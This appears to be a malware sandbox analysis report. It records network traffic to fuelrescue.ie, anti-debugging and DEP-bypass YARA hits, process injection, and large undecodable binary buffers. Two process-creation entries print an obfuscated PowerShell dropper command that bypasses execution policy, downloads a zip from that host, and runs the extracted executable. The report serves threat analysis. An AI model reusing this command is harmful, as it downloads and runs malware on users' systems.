4°yºÿJ8ÀN?®tFåÜQ¿^íÀÐD#®ã3NCºwiJ¡J©!ÆãW½I-¾ãjkÎãfÜ(æ`yµ~6).£øûn¿þÇHd3JÛcÄNeàyªhÏ¯Wý;qMw¼,ýÓÓìýiz"ìxNÂÀCMVäë+0oPnÁÏÜJUi×ÌQ2%r±3¼¼mZ;¦C8áV±×Ä¸2îË!g_Ø)¸ú}>íPyµ#YÍ[¶¸}×8,F+köp9?èn7Û¬¸DgÅâÄau÷<RæmR
Data received	n?:3vñiÂb¿R»hîÍ7ËÞD§¢°ý!oG¡-
Data received	¶ ¬xUá>¹Î;XPf£AH_W»Zé9
Data received	ù2Ë0+ª;W¼±gjïÆÐ[þB½6¢¼,>
Data received	BØÀ?¹µ¦tþ¤? ö÷K4_]R÷â¿ZÙü>Ø
Data received	Âéà3º\|³¹DmªtQ'¤ß¯©Y?¾Xk,cÝÔ.²$ËðQU7 ;Ù=æÛ¢á3Ö>Áµ(ÓÖËOAÈ`EÍ?Y ÓðÃI-3¯¶8{_Èù2Ú4üÃ¤[{Í´u()\|.¥ç»GiÒçél YZ.oú)\iW£ÇÏ,®%Àá·æçãK-&yòw©w´\d´AÄGÝåñm¡µi-; ëQ É7ÓGÜ¡Õ¨zcüØ×dtÇ7ûr¹jÁphC¼'q_ù2£ñD¿Õ>÷7r÷!åÉZï#Õèò]ÈeÚa}PùßGãëOXû$h°u´q/ÿËËzmjë7Ö\|ÞóÛyGï&O-¢È#Â_GP5EOnh 0ÆÉ&ðÃè _¿$ç§ ©'Öã£FÓ=åg,¸=eóTÝËcðvÇÒrCÌñíW'¡ë»ÿ¢·ZØýNP ³hû´sªôq@¶D"¬f`D' ýjw®mQ3Âñy'Ô ë?5<V Aï@ÇÁÈÖEÄ«z{@vEÒåL$ò.lÓýåß`^Naì1Éª 6ë2-Vî4µúÑxä _fEPH<â7»Á¹3Pmbª"íÍJ e)ÿæ+@²ÏR°¤«øp·:VR£~QRÄ8,ÔyãVôJõ!:R¹£g 2èÿÞÅù¸v-=î¼à`g81e0}5N¾üÂC¤ ÜcùôBBÆ~eqH¶Ì°Ýqx¼8l¤¸ª¶ßë«3ï½d7
Data received	ñ_¥5µ U6ÿ©$r«ÂÊRNxßÛå]H;7ås{ÊN3áä!ôj:=,ÀÒ'_9# ¡ÇÍ6I^j¬lÆ9&_ûÞ%LF\>F½b»^óÔuSÏÑZÝÍÉÂò£JáD#öL~Ûe´mëümÁûÂÚóîÝñ·?¬VÁCÊ±ñPÂ°5Ã ÷Û8·SdC£ñ9:ªÒæO:~k£¹åÑÊ¼Õâthyd(¶âÓiUãLÞµÑDÑÿNÆÞøÞ#'®Í×GÉÂ@Å\bè[ó \|# Ìçm<`Ö}®KÀøººÌûS"²S\|n<gàNEàáeS²¥µÜP@nû sRS73êP¶f¦Ë3ÉtÂ°^ Ñ£KÀi%~WºhÞ5ñÌ®i¶r¬KêìÈq4$ãqnt ëÂ¬SáT¸ HB1.×ì`ÒYêPk·xX7¾ÇÁaêVÇòAÌ8[þºéêõÇTqÚôë~¼ØþÝ\|Í¼Û0ªú¤[üäå¦@9úrdÂk¾Å&¡!~>ìÏ}héâàä1A×&Ä¤j©Å5qxñ@mÿu÷3èÜä°{´rø.»Ãw[_QÆëêt1Íÿ9ZÍ\Ñæ¾æÍ´Î¼½D /§;^9ïã´ólbjd¬ô %X·Wà/^Òy<«èDOp ">eZ'aÓKúz@HÎv¥YkXFÛJmGß ¸Üë rV RVP¦üÞÁ"Ïj¡Dv@W)´IÇ±«{!©ý%G;¿ûjNß;Õu" ©4ñ¸ö&uÇOI=_ÄÝJwÚiª:y{=Vw×îgÖa÷Ów¶P5órh ¢ßÙ±ã2Oµú8,R;çqÖ²ÓvÈf.ÐðNû¤ã²6Çt¸u?´&EìaWÅ8ÊÚE#úÚ³Mæ£jÕÿ¾Ûw Q÷µ90Õñe'D7ímøøÏ0íQø-6 :Á;4î»d`Ûí!,½©áBõ¯Á-RV\-"18µC¶çàÜÞ«/_h9ÂYóáös_vÂª:LLe+Ó;¢ µµñàSP©ùâ÷\|æåê1h°Ìùh¢_,=æÇ#Æö{1HÒ%äP°nz5,ÿLÑP1ÚÄæüé<[®¤6m©ì°.ÖÔö½H½º)¥¶{<÷Î]¿áYwwÆ#q´[Ãg+u¢üûÑ 3;CÛâbäó°%ÈvU¶íÀGò¸ÔÜÔrµ½Ö²þ©zîû-³ð]655ÅCpnÈÁ?qÈù »E³(pÃ^}E,ßÐToÉ§À·sÅnð¥}ïÍgÇÛiFÿ¾C.nî¯9XÍÔÁJz¥«¨íà£Ó^ZmÉmf£D--;ùÍÖi¤,°æsNWO=g-u Ï+sÂÖ§}Ë+w¼3õT8X!GÉAÌJÙcsèTnòð_%'»:ôÞÊQeZª,æ]qý¯ÏÕbºÿ9Ó^>Âï4{DÛLqÈðÏ\|Sûx§tÖäáÖ?1ö ¥®B"\ /É¸Åà6½þÜp?(Ü]ç×ècCã±PÒP¨âë-æq%X_9T!¸ªCÈ§æoi~JÝÛQ\|Î/ÿ¸ µDðáK1ÆBìNlºYóLÁõ õ[$bBa×nKö«ùäÏ¡ß~áÑj(«9Â#¦p,ë¿ÒÆ WÏù`³@¢XÔB7Þ:l³ó\|ýÓ&´ûq>°®µ9Rõ[ÀD÷r¿¾ã=ÍG#Ð¶¶¹ã>7ÌÞ_s ¶ð2äô)âÇj&ðF;;eÂù ª¦¯þÛ¿ÈùÕf}j\® ][y±8VÚMASQÂ¾K¶°H+Æ©,1B÷H°èFrÅh.\|Z«.S3jëKÒô¾qK©.q3_<ýY"?ñùK"^.¾¾Å®WÕ4DÂs¨ZîwÄU¥ñpöP((Ê^z@Ñ"9e'2t«6ÏúÍ~»>Á.YÖY&^[V 4B}IÏG wÕ²¨ÑÚàî¨§öÃðLÅXüW\:'Þa&SUBA"AjÕ OûôÓðÌFüðôïþ6ßC ïQ$VóoóíMQ½mÒýrEäÂõáÒÃ<åoñDe#[à3×£]"{Ã]·þ&m¨ý%sêT[ZsÊ>;³i÷ëõì3+d©7` ÈüØÛ]bÐdÝâKG&âi\ä¼Ô0GRg @·É¨KH¥ÝÉÅ½ÛyÐIA0ZØ¾¯ÿ!wÄ7§ñÍÍÛt¯È#9 X£Ëbáð`ÍÀXÓ¦,ËuM¼aýt$.JNÁ@:ÁC¨õØ6'ïeNqîÈÉD¾B+^9i/ÆÃ´IæjqC²õÚ4¢5Å¥ëdñ¤,ûÛã]Ð,ÿZÍäÔ¼òX;éAõÑöH³]{3Y¡êÄ¶Èék[÷@¨9joÏÔ:?ÕÿfÑC»Qà×6çÄ°ù÷ª¹ö?o^nYåì¯óÌæpå,0;3;Ë×W\|1'¯+kOî uA¬üÁØ`ªD¼å,Zp$¨ÇÞÝDi±Y{ðpHH±Äª ä.1Ì?pu! ¦]\|¸ã>úéAbÂPcáiÐ6íòõcBcÁ¼ÊÜÐ\³^d×s¸:P4lï!r6SÊ½ä7©WOñ}_w¼BerØ{þEP !~#Rªûù5'ÀK© øo$ý.8hn]öÂt"Q\"ØüàIZik"»äÌ¡ôªþ)MxãsüÑ´æáÙ¿èzNÿgæóÊúPÑÿ»>k°ÿÞÆÚYïzcÑÒ/ Ó XºÅ¥÷MÖVéð<Î/»+Ý\Ã÷ÑÆ ÄÕp/ÏèïK"·lR]t15ÛßÿÜ¸Ô~)náF[0à^ÝÆÉÓØFÄÐ¸Ö{Ptj³ÿ6%ÇÄgtIÅEøTP¾~C³mpíLBî(}Ý=ØàÆT(Q:¯GJÆÝdÇ1Í¼7)Þ¤ÿ( #å6rÉ'ØÃ¹kõìGx$Ñ[V££Ø®]þ^>gså¦Ve 2ÙaÅ[ò¥ÅVFø×q ¹:iGµ>L¿®dÂXâ<Ú(t^yïae¼A[ÀÜûÒ;`ÒqË2×Âs_¦«hVj#àÇlÄeQæìÓÂÙ¼Î¨xïñýæ³ÓÅe]9G\|²O¿<õ¤}@DÓµP¾u©l<ëþ@1 ¢HÓ×åÑrûSxÎë²-Ëdüøbeº¬.rÈ¢x 'ÈÞTì£þQ©@dýCÄónÅCÕ?õþ?ñËw¤e_UÕñúýòÓõævÈ ù^YçÉ=Í½ü]Âr,»Jå¹%Yô·JTVõ¾ÐÿÏ,¬4"fË¤æHBê÷F÷åù)êÐ©Pyn#aõYÝ¸²K<YÝÜò¨(òoÊHõ%îî øïÜÈpï´ø¦3ÐV[C¡+¬ÄnÓvØàUI£´I ÿMðÕhúÅýü'²BÃq½½¶éÿæ/L:³64ZïñèrÀïÕêµ¾ÕØ4ßé{±1ªýgäµI_×½Nmª¾4M}VýA%ïLT¡ÖmªNËO(öð_7tfÛõà?©® \Å0mv,UÒg¶³" N÷ægW¢í¿)ñ3×£:1XÒ>'$½ùG¡·ëÀªû0§`+×÷ÄIeàaf¦«_x< ´×z¥Çåûßj7rPTÙ3HòÁx^í±êfdÊjnX7ÒBúÈvïÍ®ÔWVïæ¦dg×%jg é§÷ì'QÆ=bôg~ù+qzyTE Ûi¹¼BÇúõQ¯£o`1Ì1giKÒ¤fcY¾;h[ËmÓ½éó½ôHÅpåt(FËA3<@ó.\»_Dü"ÜÃ6_A1~¦=boÜR0SËxú qì£ [ýÍI(½tÁÆÍÆ¡O¡Çrftù5úÒF¯Jèe«x?òlYçí0F À¡s÷ÎODÌÖ+
Data received	Ü³'Ã¸ÀýÃb%xä,&ÄY\»á@vÒø¼ye'úÊsZô\³ v¢§ ó8óz³è^Ú?Ó®ºR:{0uLÏnÕ`Uë0\}%Òê(záo7ïûË>E÷ðúeç·@¢ðçêöýÎÆÁ ð<Òd7U¯º$¿VBÂ}b¸×©c<F7:pË(ãJ;ÇfÐPJElT2e¢yqLÆrÙ¦ß<¬KY;4$gÁOõ¢M ÂzßmMì¯"ÌËö²C2Ã(ÿï\|2ÅÒoSaãèaù±<µQß4ð¿ý¸Tk[Ôªü w´AiÔÑ±%=AæÅ!]Yèé/ïu×fÆãíZ8ÈHJxÕoGüÞËñ«ô¤Üù»Ó]æ£lðË¡ûãÄJç#ÿ±dÚ<ð7À3ÌwN¦ýÛhh=PS³h¢¾ãý/`«Bá(Ìá,·§4¨¶-v-@Ü³ç¶Tì·%w`wI¢:¾`D9Æ,4.^¬H~ M`Vh.]0i³rÐ×Ñg¦ýÙÉùgÆàbªp%^ûAÉçxªÖ«X5ÊCÊ6rDýM4ñü¬B#ëZ"¶\|ÜQoþVRË½-^kP'Ä!ïöP>¤»!únpXcJ ã©~(ïFKÎ-§s§}ÐÉoâVÝøpYø&Üáö&Ô÷Íp&&êjC«ê7î 3¤ ·9cäÛ¦Àèås¸ `yRÏhS ä i¬ØÏ>úEìôúr«k\|¬vÕNzàFUø¢R(úÚÒû2VôMÿ;~ C,hýú'ÿìEªEéuWøÂWAwÏÑà½öm!·ª«¢.R.½Oð}!iö©òÂ¿eë¹d>°Ê&~;7oYK¾+Á®Íó"³L4â(:×l×/;àãN®}á~ËB%®åLLª¦×c â¨r?&ÿÇâE/esØçþÜXpÄt>ü\|\|¯ÛÂxö_êCòo§8zNóp£ýCgÉGÎu7}ÏÚOcòEÚ»DäÞìKåµèY
Data received	ÖÝ)2{MÛ§ÏX]}ñBd?ÇÀô>ûUÖ¤ËÌ¼.ù F;éb")ÈüV]¦¡`ÇÂºÅfÉ£T@«5C¡â´HÝá¨ÒE¿¥¿:d ¿¥[°vÄa9ùÜýøäû(¨îÈO°èyGkh#6 þf<ñ Q·%éæ®Tð¾QAj\|Á¥ÿE6÷9Ä( RCFÞÅø&öGf7½¥Õ6Yk¾æeZ¦N¸g3.Âõçu¯ðÙytÏò= Æ°&wWeÁA33ÊCÏjBÎqdýÆpø-ýW´÷í ¥?}jµ¯'d CiÁöÛæ «ÍÊr,.Ã±È÷o÷@ÞFiÞSÉûÔôz¹Ý´§t0è;²ú³YË=;Øa(\|´ÂÀõEs&²ÊìtÿÛÛ÷!«èÞØÆM;+Y33@¡,Dãpòp3"{ø@ÙTÑ,qhÿtðb'ó;OÂÛBq×><¡uZ57ÈHkùE+sºÃÏQLp` rÉð_)ù7VôYÄ¯Tå(è`&Ê5[Ëúßy#À-´£8Óì;/kè¬MÝK¯ð=R~UtDPHCWÛ_sWB4§ñÈy¸Þ<s@³¾,K#Å<Yõûó\|2°0Eÿ¦ÊK)¥Ñ{YÑO-·Ê5,4ñW"Û;ó±Y+v1öcDjÝ ò²r"ã¥ÑûÞBBÝ-7×ÌkqîoÚ>_%ÅÒS",'±¢M7<GÍwcjØ²Æ×:æ¯ÉÅc,áÔh¯JÖWú-À{gpâØª9ÿµMÝC}2¼x#ïu\ãJê#)>½)?\|A?^í9/ã½[ôgxýðóHq<n/zûÕú·ãYz»íÈjÏVU£j d¯ÔVªYm$pêI¤z¦Qß±~»[/¹º#+ÈéFr$¤lÐþ Þ}sé±¼Áï¯?²ÆÌòh,8{ &tJ¼Õ(oçþî¡m;À \|(°äÐ}sZØ\?Ä·°3; \|kü7H;é²UIfºRU»oÐ¶ Ê9V-¹[qä$ºiÿWïÄ£HG;K7sþc÷Ã1ë.IJ3ÒzpÌî^wq(Áû×ªS¤RN¾Ë=þ]¡y¥;÷ÓFcÊfóu Ài¿¦é{ÑAÑaÎPxFÊ"qîçñLp! ÷xwú¸óØµÿ%ÞÂû½[ ? ÊÁVñÕ¶ô6>\+øÍg¦-û^°þ¦2zÚ§¶ÒÒlYÏ.Ä.¡.ñ5Ñ±$ÏÓã¡JñÇÚ²K7ë}Ö\|??{YíiÖæpÒôo:ëÛ¸0>2ûÇ¹Ø¿Ê:BE;Ñ®¸yº¥/!È4«Ó\+RDaS!,dNx¦6#-¸!X9³%iwün{"c KzõcÊ:ÖØÜdçïA¾/Æ¤(JUR~ÞÇîDéë;3F:äaÃ Y¤>þé¤dQ"Z[Rs~åï$) D1qCð@Põ©tÝ7ýSQ@±à:«u£PYº"?1=ÂÖ¶±Ï]°;÷ÃËÔACPÐÌæû®i(}îSÔ¼Ù+@ñÕÃÁÙH²Þ¹ÒbåatAYÀ:Ä'º¤Ù«xÂyëãI Ó2-nÚ£óDN2ÇC3+#¤h#oBö/²©ÄQù\|`Í¨ ÖJÃ}µö Xc% þ<¼+V=Ñ[© ùQPñ³"²'¬ 'éðð %+¿z®ê:_6>&ªQ^;·1¨JþÏ÷q®øòxÅ P7!\·KµËøTb½©Ó=9-Úµ-7XeÃûçÀL5n>DÌV¥+òªÎé÷@ç>,[qW§c¤·#&ºf·É²í0§ÈxWõHÓ¸7Ä³mÙõÑUòùpÉ¹©åÖ:HËÇÐT'<¥\|p1L.~}ÒåõV;Wøß9GÌG ææ£ÄaoSZCòÛwÆ°ª[9KQö##Q5ôa½«Ó[óÈ£¤ô,%FÇ6>ZÄ\Ã¨< :ì tºiC`ÏÈµÄ¦dZ>¢øÕ ¨öÓ¹1þÙ-ÄKbZg/&ØúL\|Jo$ <Ô ¼aîi~ÿ¡ Åï©jp¨ê.à~àáÌ¡¹û×liÚs?0hÒÌrtÊJðÅyijcOÔöjùé/N âìÅ© æ«VÎSiânÜá¾û7ö¢¡ã³ágPcÔsc¼iYmCðNvâ&\¾<Y/ m3pEâæ0¸TÃ4älm:ÛÝ«HÄvµ7ËÃ³-4Ò%Á³ÓÂÊI %_SÂ µð©!óõÚ8ÃÙ³Eæ3Èî´ÏTÓM¨Ñæd%ÎºÆtäØ"\|bâ³ñ~Rk%ÁÍT5øëJÓúºSé×Yæ-Ñ!f8(Uýe¡©&å°Qí¨M÷k,¤CírL :á6² ¼B¬xGàûøÐú?ko¼ý.r ×(WR+XÃþl¥+õi\+÷!aGÉ@>òÇò¹â£ vJþ>iöîgèqó©æ´:#ðw;³+eêd5û¢\|TýÁÇl³uäÑr`àYPañ¸w/©p..^Ïö( Ôx¿)N¸Ë3E²îîóYS9o#DLß°Þî&Õ¸ &{f<ø1HJÔ³ÉÂÿ<³WÉûÓ8 Y»äüÆA.8/©j¶HÄ(`P(.×§®ô²Þõp1Þð<Ì@C+¢ teúx¡5¼Ü6G¥ÙÆ×²þbf ¥'Ìüè<¤{6GST#úÉÙ-c3X Éú;fÌ[þnÃõlúÕêFiÀyr»ñ¶ã1á~0âLºàÙ4ÂJ®<®ê^øKéõ9Uå?í[p¡áÓ7ªãSY¬ª7æ \|éqÛÒÜ¸íÇ Ì+($ \|È¤ot7mÍ{<Úª³+\óÙÀGoôÄ-oH¸Ê\f×W{@¤ý×¦Û8øð5ß_ÑÏ!µÍp²Øø¨dTÖ·èÃ«¨ ~(±~C0ytÀ¤BJ6¨Ë)¥¾¢äÚ×i®ûËÂrÃEnaõ áèÞ{ê÷ôðÌ ½Dæ?»fq®ÐÒ6áÎfëQz&6(Àé¡A+8lBÁ\?æ°TõN»ïÔá"hXî«³Üü9X[¡DS@º6úÈw\)\Ö¶uB'íÄöt\H8ÚõLëÑ'6ÍÇ\û¦Ó<PÞÀS,çajk»]¹.8Þÿ*È)æiu¿S9iäÇ=ÜÈé½·XèµI.¯\|ëK\|p_ó¢ñ qÙ×p çú5(:¿{Ï½S³ \|¶`&g4?èô È"Å]
Data received	u&N$ðtÁ£'Oñ¶Ò¸íXßD~
Data received	"ÌS¹$\|t©h´zÊSÿ´G&pZ;ÂöIy®Éá
Data received	ð&¿qWÉ*cC:XÍg4àaÆ ÞL:
Data received	¤ãÏ±ü¯0Zo9ôÄn1ì¸íaí
Data received	7çVÂ£ Ê¯u=ÓÜ}G£æÇåúoï³ª¹ÖÜ«ú4GzùYé®Û¿Ó/Þ)ìÐIy×ÀiÚ hõëz6x<On¸ÐË+÷×Ô,\|ÅuÁ¿Fèä$±ßóQT´©ô¹ö³(¿GÊVgØ#ðüJ9¢ ËVaüJÁ.Q}Yóí¯rMT eùGáÙÛÊxê2A£ÓAñ?'æðÊðßRô§¼öã@+~çñOeù²jj¨ìësÿ-?k¶Ly}ÌÖVåùÞ¤fà»ý¼´·O)ÐHMÿÅáâ´Òre áãO¤(Aà`öHC`æ¡Ó8]¸s©^½º&ô%½IW55Ìµ>¯@¾&ýnáoâ¢p¡téU<RzKÔdDìÐ°tDfÚË3ª÷©zúe¬?oiØ4êZû"¥fpµ®ÞE6(ün<DÕ"µ®mjÈjèë¾?»%»VÂ~£P.ÀE=-óÐë®ÞûúkÐ \¥ãLAðÂràg\Q~ÊÓûI¿+#òá ¹ÑTØO¸ Ðì85\|»Ö];ÿoñâi4´7êò q¾"¥vCb¢w¾é©4"úÏd!g±¿kb¬ZÃ8º. ñ ]V`½ÈïlêÙòyÛä+¿
Data received	Fº\|P#UºµLqj<Ûµæ³s²õÿóÂ1`À`¨@Ïsjª³£cx 8ÁkÇ'Á7xýÇèp:º \Ø%ËXüVÙÛËê46&)çOìõXg^/$äû¼õr~ånÍé1x«èÝéææhK¬8,¢Vçñ»ÑlÓãö¿Ôêk°:ýÅF~õX$»ÂºÒ[ÿ´#7¶Ï'ÈÙqs§8CÂOLûÛéMQq¤Mx)j¬©½T[ö5<ÖåÀòº#â²#ÑÍ÷ °È`¾¼9hsJé^_èîá¦ü8¡%E@z¡c¿0þÐßÄbÚûÁ7o»p¿,©ê%z¸mÿ°mú÷ü¯\Çn©^ÆÉf óKÍÏïµyÀª£¡«U¤ÙÓÅÈ°ð¥°º®lE1zlu7ñP/É×%TO ~rþIQÖOºÈ]¿áiÖÊâßqmüÝX!Tò¾\k¡NË Öãi ìåµMaÇ¥oÁù¢CåPÂPÅå8Èp4G§`Ò«;àz^8.ÆäB°&ç®B¿ Ð}§wEUoûk5Üp3S(å8wC«R[ÌGpCþ©lÓ(ßÚð«Å7&´ iÙª:¥üTkà®Gøÿ~j gzGÞ ¯¿LDÒýÅæ¾b=Ô3Ì±ûÐýÌËç¾½~ôúËÁ52o!7×ÿñgáå¾¥Ï%%àÚÃ·üÉ6î?¤Óo¤ ÏÆÐdfiÊx×wÈ W§áº¨&yÀÌÕLÏÚ@A(²g9åê)®ª8´óûÁ¸¡ùÝ¡ Lñÿi5ÚÉÅÉ½R àetf«qGúFõ´ÚÞ¾QÚ)HpoSÝpÇÿ [ÔûþZ½LO)¯=ª&« ø½ªlårßU¬>ÂcðËò!Ëãò§IÈýáøoKl#ú5ÏµºÍ"9.÷WYø uiøc¶f¤¼q·¾c"Àó¬¼òÊ·Ê²1ÂµB]Gê»"~²ÑûójR}Uáù° ´ZrºeíÙ"%ü½ÔÊu}©»f1wÃI2Ê¦§ÇÇ÷¹:ö4Ûù 8åí9ôxCÍA-éÅüÓíà~SÉ8ÑÇøRüÅAì\|v!Åç¶EÊl»tQ~® /Õ8+3 ûÂÃ»#j5"ò_Ó\fg< °ñ] næ4ù?¡7ü#%ù}ådË6 ¢ëSå¿E¿»cÄFÀì.¦¢c^V·?ý/ë¤nðì~q¡VÁ8;¿ëp²LoÞ»=ÜHÕ8@GXmó8¬AÖÒ:YÙ®1xú¶QF_=Ý6fî:ç#vHc?b`m#(þLâÎ%~%Çp¶¤õÓecbÆðý¾Ô®.uï2vú®MÄ¡EA¯Æ¦ýÝ 5}Ç\|&ª>;$ð2y^ÙLø©v£2æÄôÉwÅ$4Z »¡ëåwºd9==$ä2Pî8 L®äÚ,ìÉUa2\|ÓÒOb5Kà¤èO.¦ÒÃwàý²kFe%IêT:É±R³:D7Õ´r¦4×kt´ïvo B&M\|[7NpKUtGQ²»S@ÛÜ)t0ö×ÓÙl×µT¦ôór ßsèOöHèÉG.§>lÜdñ¾mº0?kpoTv¼Å§H éíõBoTF&l^Úgbó9)³dke ÿîmò»UU=¯u¯sCÔ_òoRyZ÷{pç^ }üÕ`£¡O":Ûâtò½§üÝúÖÞ¾Xq¿Qn«UÚRzb±º ô¥ËP'X:kd-ÊÛú©^ôïì¹RIºEa³8ðÖrïÇ¡Uæ½ÀùÈ§úOÔ$8{±ÐB{m#¨´Y ¬e©Þ²÷µÅS¡,~¼ÞMñ¹ã±NNÁ'ÐE´õ% q^¹yE§?ÊPò$¤U7PIp7l`ïë¬m¯x ¹¨ÉË÷s1¡hIÓeFÍh¼êÿÉV3®p>L4Yr,ÐWeJ£µéÂmÒCÞê¯RÑK"`?1ÃÀ'Nã+IýÏãL¬¿æªGqMÞ°Î×{»ìþ+þÓó÷:ÓçCUÏ-@@ ¡Ê§ø6Â+òêÀ{]!ó ³½tÓ´-ßá§ êçn3àë'U TgDÒZÄEæO½÷íìåyüHÕ7Ü]¥ÂkºEA`¿øÜ¸ýh!¾ga6 ø$m^ø¿&Qy$É³Öøó-X3[ïÕ·"M½ÇÓ<É+'×LXÇ¬;ýíÚ_³É¶_Lkf¯^Ý ½ö½mJ¦ºÎêÉaª´\óÅLKÜÃÂEÌcíÆ×Âê)b^°ÝÑâG§FxN¡@ãÖªô%ßÝ\|i?ò®OÃnèZVÿJUôçî{ìÄÇ\\jx.&FÁpÍì×±JÍô¤HD8}OÿKÆ¿J<²ï³"©µfçÕKK ;Ñ-Ì$p8áFúÆ¤[×iÄ³¯ôÖ¸ê<>®ô,=Û2 âPËswàá÷öhñÔ4§Áô0 ¸ÂA\|N^Ð£ãGÒñh_ÜdgÝÀÖs¹\|g´[²[ÊÆWð#V/ô1õH9£ë`·â2<ªÁ¾þ¸+"TsªÄÒÕo®xbü#O5N7×8É²YD íïèB÷agúç1\fÊ äìM_¾×I»ìÛ:¾;výG&&]ùBù÷!É¶/ª·.Ìõµ®ïì®ÐO´¬ (4zÿL´3#ÏÁ^bîÀ>yEêHpñÛ>Æ ´á6Ø§î§0)ÑÒÌLWâ'² ìnô úDÂ÷&ÉJì<dÞQ¦ò$ÛÉÙIë uNT'A·àèvQÓÞÚkR_3Pñ7ÕÿóWxtNp²û}±9»ànPLÕf¹sÍ©ûÛj·ZPCî_·Z<$chÂ´NÎ±ëà²A4#ääo-lqglG( p·l#éôWÅ¬òßÏ¢HÓ Ùn¢ó>öDìJÝ µåÉr)©uÁ ª=x¶ÿ1º#âiâÕ§_×v8H²tTÎFbQTeî¬ÁIøù`{8¬¹A95Å±ÇX¼QX \<êPë4Ñ`¸ :/}ÍzÌö¢Bnsª3âØU·ÅÀåË éøNz\|6[êé3l(hÿzÏaeÿ}àÆ=YôTÂéÐÏºóTQm¶aË¹O^Ä[Õ¯In\ñ«Hy¥øU¨%7WÛºO¦ØvV¡Qãagm^âFKh#5²¸96¾0P¤F½Õ½ÌzQA4{þÉù,ÄÃä"¤u±ÈE§ö!1MP,N35ÇE«Òëw¢@ûYüIõ»µÝ,ªmÈ1¶MÖátßñxLQÕÇÉs©= Rì=üuÓ$T¢õò¬û¸nãÔçÆÄ¨_;À8ÃÂp&jþ;]ôß[BxvWì÷gyô3ÔíÝæéáÖ\|±J"²$âM÷ºnÅíTYÑ"Ánä~"ÖÕxÆW?aüt}ÅøÕ¸îÀ¼¤ å6#D \|áØ ü Æ@ k8áÀlÙNÄàI2ào¿Øä IÓËSjåå£uÍßÆ®=;õM_ÕÌ2µå¤1V{¹PZí=ÆË¨uàlj2¶þ=s¥5¿@xkréú 7\RÂÍEû±@î@GÄßÀhpÞ-N7Ý)ò£fæóÔ t¼É0,Õ¤r¿åðGØ1üG«ÞÇö=íµ 'Á6û¸zqpB×òÆÁµÞù¿Õ¿;xE¥<<ÏÌ¢h\ê â Îù»§[Úp iÁ03'á¿XÂò±?ëâ6¢Øvó°láúß¢Í¾óÈ9çl«%½Q÷UÒù¦\(" üJJ1X@Ó 9Ae×Õ¦×]Ø^ÖÑBÈ:dBF¼¿Ó£}{`û8Ì[JzW¬þQÇ@ Kqç±Ý#]Ú*`²áH¹

Poweshell is sending data to a remote host (3 events)

Data sent	pldk?ZulU×&eÚY.²ðmöè.JÃø@î/5 ÀÀÀ À 28+ÿ fuelrescue.ie
Data sent	òk3LGN·ø\ª8½ãÙÏÃz¡×·3Èø^ öâªÿê¡x¬Dðé¨ÞßîbíA=øÑ½Ýæ"Õâ\|³üd} úÞ©ë=RIÅ H4ù7Ìò}Nw V7=æn¦æ´Ïw@fNÑådìÉj"îp* ¦uàæÖÝ8¤¸7èNÆ7æ;r¯x»ðñ]@Vý2- :"AyLjÕgH½W5´®ÊLÓÛì%7:NÒ×U!_?õÚK³a4Á¯,ßØÁ0V´½.tåá¤¼gglRÕlø@0°¢/ìH!R.1ñØÂº){Â3& ïûö!¢Ü"WEò¬¡BìXÞHZ¶À
Data sent	4ÖrH¬ñ$USË´¦^íK9¹Cáy®ñ²zÆÃ$-ZÌyüÍòâ¥ÒI©,©Rm§¯;ÅÞT'Jà¤»üÚ]£/¿¢2wJv´^øC³ÊõµØXkÇ¹µË- FßÓ9}Çm3½©ºEútÚÿ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 9, 2023, 9 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send June 9, 2023, 9 a.m.	buffer: pldk?ZulU×&eÚY.²ðmöè.JÃø@î/5 ÀÀÀ À 28+ÿ fuelrescue.ie socket: 1408 sent: 117	1	117
send June 9, 2023, 9 a.m.	buffer: òk3LGN·ø\ª8½ãÙÏÃz¡×·3Èø^ öâªÿê¡x¬Dðé¨ÞßîbíA=øÑ½Ýæ"Õâ\|³üd} úÞ©ë=RIÅ H4ù7Ìò}Nw V7=æn¦æ´Ïw@fNÑådìÉj"îp* ¦uàæÖÝ8¤¸7èNÆ7æ;r¯x»ðñ]@Vý2- :"AyLjÕgH½W5´®ÊLÓÛì%7:NÒ×U!_?õÚK³a4Á¯,ßØÁ0V´½.tåá¤¼gglRÕlø@0°¢/ìH!R.1ñØÂº){Â3& ïûö!¢Ü"WEò¬¡BìXÞHZ¶À socket: 1408 sent: 326	1	326
send June 9, 2023, 9 a.m.	buffer: 4ÖrH¬ñ$USË´¦^íK9¹Cáy®ñ²zÆÃ$-ZÌyüÍòâ¥ÒI©,©Rm§¯;ÅÞT'Jà¤»üÚ]£/¿¢2wJv´^øC³ÊõµØXkÇ¹µË- FßÓ9}Çm3½©ºEútÚÿ socket: 1408 sent: 133	1	133

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
parent_process	wscript.exe				martian_process	cmd.exe /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3048 resumed a thread in remote process 1784
NtResumeThread June 9, 2023, 9 a.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 1784	1	0	0

Creates a suspicious Powershell process (4 events)

